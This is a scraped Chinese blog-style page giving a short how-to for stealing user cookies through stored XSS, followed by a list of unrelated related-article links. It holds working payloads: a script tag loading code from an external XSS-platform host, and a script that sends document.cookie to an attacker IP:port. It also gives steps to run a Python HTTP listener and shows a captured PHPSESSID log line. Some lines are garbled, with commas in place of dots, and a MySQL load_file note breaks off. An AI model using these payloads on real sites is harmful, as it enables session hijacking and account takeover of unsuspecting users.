当前位置: 首页 > news >正文

利用XSS在线平台获取用户cookie

news 2025/7/7 11:44:49

//XSS弹窗:
<script>alert("xss")</script>

 

XSS漏洞:

 

//XSS弹窗:
<script>alert("xss")</script>

//XSS在线平台:
<ScRipT sRc=//7ix7kigpovxdbtd32fuspgffmtmufo3wwzgnzaltddewtbb4mnek5byd.onion/xTtC01></SCriPt>

 

利用XSS端口监听用户cookie :

前台:发表评论点,评论能够插到后台

后台:每隔一分钟刷新一次

不用xss平台

本地监听 端口的形式
python监听
<script>document.write('<img src="http://17,16,143,131:8099(被监听机IP)/?'+document,cookie+'" />')</script>

监听到的信息:
172.16.143,15 -- [31/Jan/2023 16:21:3] "GET /?PHPSESSID=05h6m0k67m8ad3jsn7rmiluum5 HTTP/1.1" 200

xss原理:还有xss的:

1:攻击机起服务监听
python -m SimpleHTTPServer 999

2:往攻击机插js语句:
"><script>document,write('<img src="http://171,16,143,13:999/?'+document,cookie+'" />')</script>


//load_file

在MySQL中,load_file()函数读取一个文件并将其内容作为字符串返

http://www.lryc.cn/news/112846.html

相关文章:

  • rsync 命令以及脚本使用
  • 【数理知识】协方差,随机变量的的协方差,随机变量分别是单个数字和向量时的协方差
  • WebDAV之π-Disk派盘+可达漫画
  • Spring中Bean的线程安全问题
  • Java spring boot 全解Camunda 7,从 0 到 1 构建工作流平台——第二节:Spring boot 简单集成
  • 手持式静电测试仪的运用原理
  • 【css问题】flex布局中,子标签宽度超出父标签宽度,导致布局出现问题
  • 【vue3】前端应用中使用WebSocket与服务器进行通信并管理连接状态。
  • 服务端高并发分布式结构演进之路
  • 微服务基础总结
  • 实现vscode上用gdb调试stm32
  • 第4章 变量、作用域与内存
  • Python爬虫遇到重定向问题解决办法汇总
  • R并行计算
  • STM32 低功耗-待机模式
  • 极海APM32F003F6P6烧写问题解决记录
  • 【大数据】Flink 详解(一):基础篇
  • ChatGPT 作为 Python 编程助手
  • 饿了么输入框限制只能输入数字,并且保留小数
  • kylin-Desktop gsettings 获取或设置系统配置
  • setmap使用
  • Python3 网络爬虫开发实战
  • docker: CMD和ENTRYPOINT的区别
  • DC电源模块对于定制的要求主要有这几点
  • Kubernetes高可用集群二进制部署(六)Kubernetes集群节点添加
  • 网关 GateWay 的使用详解、路由、过滤器、跨域配置
  • vsocde里面远程连接服务器报could not esatablish connection xxxx
  • Hi3798MV200 恩兔N2 NS-1 (二): HiNAS海纳思使用和修改
  • 无涯教程-Perl - foreach 语句函数
  • easyWechat 5.x 复写代码 获取企业微信授权用户敏感信息